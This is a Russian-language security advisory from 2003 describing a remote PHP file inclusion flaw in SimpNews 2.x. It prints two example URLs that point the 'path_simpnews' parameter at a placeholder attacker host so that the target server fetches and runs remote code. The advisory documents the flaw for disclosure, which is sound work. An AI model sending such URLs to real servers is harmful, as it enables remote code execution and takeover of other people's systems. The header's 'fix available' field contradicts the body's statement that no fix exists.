Дата публикации: | 23.07.2003 |
Всего просмотров: | 1255 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | SimpNews 2.x |
Описание: | Уязвимость обнаружена в Simpnews (www.boesch-it.de). Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы на целевой системе.
Сценарии 'eventscroller.php' и 'eventcal2.php' включают несколько PHP функций без надлежащей проверки включаемых файлов. Удаленный пользователь может сконструировать специально обработанный URL, чтобы заставить целевой сервер включить произвольные PHP файлы на удаленном сервере и затем выполнить их. Пример: http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/ Это URL включит файлы 'config.php', 'functions.php', or 'includes/has_entries.inc' на сайте '[attacker]' и выполнит их на целевом сервере. http://[target]/eventscroller.php?path_simpnews=http://[attacker]/ Этот URL включит файлы 'config.php' и 'functions.php' на сайте '[attacker]' и выполнит их на целевом сервере. Уязвимость обнаружена в Simpnews 2.01-2.13 Способов устранения обнаруженной уязвимости не существует в настоящее время. |